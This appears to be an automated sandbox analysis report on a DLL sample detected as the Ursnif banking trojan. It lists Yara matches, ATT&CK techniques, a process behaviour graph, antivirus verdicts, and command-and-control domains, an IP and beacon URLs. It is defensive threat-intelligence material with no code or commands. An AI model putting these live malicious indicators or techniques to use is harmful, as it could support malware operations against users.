                      Source: Yara matchFile source: 0.2.loaddll32.exe.920000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a60000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.a80000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4ea94a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9f0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2bb0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.12994a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.b40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a60000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4ea94a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49a94a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b80000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a50000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.870000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.d80000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4d494a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4d494a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49a94a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.880000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.12994a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a90000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.920000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.883888908.0000000004D49000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879831053.0000000000A50000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879772547.0000000000A40000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.884087885.00000000049A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.881330354.0000000004EA9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.879852238.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.880442482.0000000001299000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.878853677.0000000000870000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.879036722.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.878927946.0000000000880000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.879010768.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.879009895.0000000000920000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.880994352.0000000002B70000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.878979369.0000000000990000.00000004.00000001.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000002.00000003.620315557.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.884237946.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613835753.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612905346.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612880805.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612995967.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.880807454.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701819091.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.613174085.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.664565353.000000000513D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620214841.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.702016309.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613794834.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.642767964.000000000523B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.881549232.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620265495.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.635568127.0000000004E5B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620243933.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613948347.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620142786.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701985470.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.679769381.0000000004C5F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.702307918.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.657340118.0000000004D5D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620475830.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701915707.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613862631.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613818747.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.884432102.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613737711.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620285363.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.613014620.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612932234.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.658506384.000000000507D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612953290.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620302187.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612852123.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701957231.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.746687116.000000000186D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.768852725.000000000176F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.686987362.000000000503F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701777888.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.702038882.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.724522780.000000000196B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.636697378.000000000517B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.681026277.0000000004F7F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.620184852.00000000053B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613707607.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.701868957.0000000001AE8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.612982412.0000000004FD8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613851431.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.613762692.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6980, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 7000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7012, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7052, type: MEMORYSTR
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b80000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.920000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a60000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.a80000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4ea94a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9f0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2bb0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.12994a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.b40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a60000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4ea94a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9e0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49a94a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a40000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b80000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.990000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a50000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.870000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.d80000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.9f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4d494a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4d494a0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49a94a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.880000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.12994a0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.2b70000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.a90000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.920000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.883888908.0000000004D49000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.881014887.0000000002B80000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879831053.0000000000A50000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879916049.0000000000A60000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.879772547.0000000000A40000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.884087885.00000000049A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.881330354.0000000004EA9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.879852238.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.880442482.0000000001299000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.878853677.0000000000870000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.879036722.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.878927946.0000000000880000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.879010768.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.879009895.0000000000920000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.880994352.0000000002B70000.00000004.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.878979369.0000000000990000.00000004.00000001.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation2DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
                      Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection112Obfuscated Files or Information3LSASS MemoryAccount Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing2Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)DLL Side-Loading1NTDSSystem Information Discovery14Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsSecurity Software Discovery21SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion1Cached Domain CredentialsVirtualization/Sandbox Evasion1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRegsvr321Proc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 527046 Sample: WTXuYxax6d.dll Startdate: 23/11/2021 Architecture: WINDOWS Score: 96 28 technoshoper.com 2->28 30 avolebukoneh.website 2->30 56 Multi AV Scanner detection for domain / URL 2->56 58 Found malware configuration 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 Yara detected  Ursnif 2->62 8 loaddll32.exe 1 2->8         started        signatures3 process4 dnsIp5 42 technoshoper.com 8->42 44 avolebukoneh.website 8->44 66 Writes or reads registry keys via WMI 8->66 68 Writes registry values via WMI 8->68 12 regsvr32.exe 8->12         started        16 cmd.exe 1 8->16         started        18 rundll32.exe 8->18         started        20 3 other processes 8->20 signatures6 process7 dnsIp8 46 technoshoper.com 12->46 48 avolebukoneh.website 12->48 50 192.168.2.1 unknown unknown 12->50 70 System process connects to network (likely due to code injection or exploit) 12->70 72 Writes or reads registry keys via WMI 12->72 74 Writes registry values via WMI 12->74 22 rundll32.exe 16->22         started        52 technoshoper.com 18->52 54 avolebukoneh.website 18->54 26 iexplore.exe 2 145 20->26         started        signatures9 process10 dnsIp11 32 technoshoper.com 45.9.20.245, 443, 49881, 49882 DEDIPATH-LLCUS Russian Federation 22->32 34 avolebukoneh.website 22->34 64 Writes registry values via WMI 22->64 36 btloader.com 104.26.7.139, 443, 49821, 49823 CLOUDFLARENETUS United States 26->36 38 www.msn.com 26->38 40 6 other IPs or domains 26->40 signatures12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      WTXuYxax6d.dll18%VirustotalBrowse
                      WTXuYxax6d.dll25%ReversingLabsWin32.Trojan.Generic

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.2.rundll32.exe.a60000.2.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      2.2.regsvr32.exe.9f0000.2.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      5.2.rundll32.exe.2bb0000.3.unpack100%AviraHEUR/AGEN.1108168Download File
                      0.2.loaddll32.exe.a80000.3.unpack100%AviraHEUR/AGEN.1108168Download File
                      2.2.regsvr32.exe.d80000.3.unpack100%AviraHEUR/AGEN.1108168Download File
                      0.2.loaddll32.exe.920000.2.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      3.2.rundll32.exe.a90000.3.unpack100%AviraHEUR/AGEN.1108168Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      technoshoper.com6%VirustotalBrowse
                      btloader.com1%VirustotalBrowse
                      avolebukoneh.website6%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://avolebukoneh.website/e0%Avira URL Cloudsafe
                      https://technoshoper.com/H0%Avira URL Cloudsafe
                      http://schemas.mic0%URL Reputationsafe
                      http://avolebukoneh.website6%VirustotalBrowse
                      http://avolebukoneh.website0%Avira URL Cloudsafe
                      https://technoshoper.com/glik/qu_2BrFb5C/WnN6ktioLVJSC7NZ8/8U42mL0TVXds/GucNTaVpvRD/cGAaQnoHqkvTq7/u0%Avira URL Cloudsafe
                      https://onedrive.live.com;Fotos0%Avira URL Cloudsafe
                      https://avolebukoneh.website/glik/kUbizXMZCF/wcseO9tQzGMWY7_2B/Eo6XsQr55EXJ/TJZ97_2F328/3bdZBpl1pP_20%Avira URL Cloudsafe
                      https://www.botman.ninja/privacy-policy0%Avira URL Cloudsafe
                      https://www.queryclick.com/privacy-policy0%Avira URL Cloudsafe
                      http://technoshoper.com0%Avira URL Cloudsafe
                      https://technoshoper.com/k0%Avira URL Cloudsafe
                      https://technoshoper.com/Y0%Avira URL Cloudsafe
                      https://technoshoper.com/glik/DGgts_2FWsor6_2F7EcO1Do/0g4WUbLA1T/K9_2Bu0NIeWan9Hma/XZBvL_2BDNj7/jAap0%Avira URL Cloudsafe
                      https://avolebukoneh.website/lI0%Avira URL Cloudsafe
                      https://btloader.com/tag?o=6208086025961472&upapi=true0%URL Reputationsafe
                      https://avolebukoneh.website/l0%Avira URL Cloudsafe
                      https://www.stroeer.de/werben-mit-stroeer/onlinewerbung/programmatic-data/sdi-datenschutz-b2c0%Avira URL Cloudsafe
                      https://silvermob.com/privacy0%Avira URL Cloudsafe
                      https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?&quot;0%URL Reputationsafe
                      https://avolebukoneh.website/glik/pAGZhq9MI53nZ7OH/rIg4LX9fBTj6pjl/8TeMZNhc43A_2FVYsQ/YCg3QZ_2F/BXKX0%Avira URL Cloudsafe
                      https://technoshoper.com/glik/rHKCmFtHVZPPm/wqY5wPH_/2F29vTv7wl_2FGq_2BrLvy6/oSB1MCzJ6Y/1nsQKibmjik_0%Avira URL Cloudsafe
                      https://avolebukoneh.website/glik/oPO1MTCZATyGVB9JDx/_2BxLrMZv/XGH5EgNCAONySOCpr4U_/2F_2FSC6yLxw_2BR0%Avira URL Cloudsafe
                      https://onedrive.live.com;OneDrive-App0%Avira URL Cloudsafe
                      https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.c0%Avira URL Cloudsafe
                      http://avolebukoneh.website/glik/.lwe.bmp088990%Avira URL Cloudsafe
                      https://assets.onestore.ms/cdnfiles/onestorerolling-1605-16000/shell/common/respond-proxy.html0%Avira URL Cloudsafe
                      http://avolebukoneh.website/glik/.lwe.bmp088991256473871MNTYAIDA1010010B0%Avira URL Cloudsafe
                      https://avolebukoneh.website/glik/KwktcAgJA3haqk0/Ms0fL0B4XccTTFIyK9/usG_2BHjp/uyERKVkE6Su_2Fw3uS2y/0%Avira URL Cloudsafe
                      https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json0%URL Reputationsafe
                      https://docs.microsoft.co0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      contextual.media.net
                      		2.18.160.23
                      		truefalse
                        		high
                        hblg.media.net
                        		2.18.160.23
                        		truefalse
                          		high
                          lg3.media.net
                          		2.18.160.23
                          		truefalse
                            		high
                            technoshoper.com
                            		45.9.20.245
                            		truetrueunknown
                            btloader.com
                            		104.26.7.139
                            		truefalseunknown
                            avolebukoneh.website
                            		unknown
                            		unknowntrueunknown
                            assets.msn.com
                            		unknown
                            		unknownfalse
                              		high
                              web.vortex.data.msn.com
                              		unknown
                              		unknownfalse
                                		high
                                www.msn.com
                                		unknown
                                		unknownfalse
                                  		high
                                  cvision.media.net
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://btloader.com/tag?o=6208086025961472&upapi=truefalse
                                    • URL Reputation: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://aka.ms/MicrosoftEdgeDownload&quot;regsvr32.exe, 00000002.00000003.734351733.0000000003000000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.726519233.00000000054F1000.00000004.00000001.sdmpfalse
                                      		high
                                      https://avolebukoneh.website/eregsvr32.exe, 00000002.00000003.845351193.0000000002F97000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://assets.msn.com/staticsb/statics/latest/oneTrust/1.2/consent/55a804ab-e5c6-4b97-9319-86263d3655a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                        		high
                                        http://searchads.msn.net/.cfm?&&kp=1&{5EF2C13E-4C8E-11EC-90E5-ECF4BB2D2496}.dat.4.drfalse
                                          		high
                                          https://technoshoper.com/Hregsvr32.exe, 00000002.00000003.823390201.0000000002F97000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://schemas.micloaddll32.exe, 00000000.00000002.880735294.00000000016F0000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.756172604.0000000002F70000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://contextual.media.net/medianet.php?cid=8CU157172de-ch[1].htm.6.drfalse
                                            		high
                                            https://www.msn.com/de-ch/nachrichten/coronareisende-ch[1].htm.6.drfalse
                                              		high
                                              http://avolebukoneh.websiterundll32.exe, 00000003.00000003.612905346.0000000004FD8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000002.884237946.00000000052F8000.00000004.00000040.sdmptrue
                                              • 6%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://technoshoper.com/glik/qu_2BrFb5C/WnN6ktioLVJSC7NZ8/8U42mL0TVXds/GucNTaVpvRD/cGAaQnoHqkvTq7/uregsvr32.exe, 00000002.00000003.664286279.0000000002F73000.00000004.00000001.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_promotionalstripe_nade-ch[1].htm.6.drfalse
                                                		high
                                                https://onedrive.live.com;Fotos52-478955-68ddb2ab[1].js.6.drfalse
                                                • Avira URL Cloud: safe
                                                		low
                                                https://www.msn.com/de-ch/sport?ocid=StripeOCIDde-ch[1].htm.6.drfalse
                                                  		high
                                                  https://avolebukoneh.website/glik/kUbizXMZCF/wcseO9tQzGMWY7_2B/Eo6XsQr55EXJ/TJZ97_2F328/3bdZBpl1pP_2regsvr32.exe, 00000002.00000003.845331673.0000000002F70000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msnde-ch[1].htm.6.drfalse
                                                    		high
                                                    https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel52-478955-68ddb2ab[1].js.6.drfalse
                                                      		high
                                                      http://ogp.me/ns/fb#de-ch[1].htm.6.drfalse
                                                        		high
                                                        https://www.msn.com/de-ch/news/other/er-schrie-g%c3%b6nd-weg-verpisst-euch-dann-gab-er-gas/ar-AAR0rVde-ch[1].htm.6.drfalse
                                                          		high
                                                          https://www.botman.ninja/privacy-policyiab2Data[1].json.6.drfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://outlook.live.com/mail/deeplink/compose;Kalender52-478955-68ddb2ab[1].js.6.drfalse
                                                            		high
                                                            https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg{5EF2C13E-4C8E-11EC-90E5-ECF4BB2D2496}.dat.4.drfalse
                                                              		high
                                                              https://www.queryclick.com/privacy-policyiab2Data[1].json.6.drfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002de-ch[1].htm.6.drfalse
                                                                		high
                                                                https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn52-478955-68ddb2ab[1].js.6.drfalse
                                                                  		high
                                                                  http://technoshoper.comrundll32.exe, 00000003.00000003.612905346.0000000004FD8000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000002.884237946.00000000052F8000.00000004.00000040.sdmptrue
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
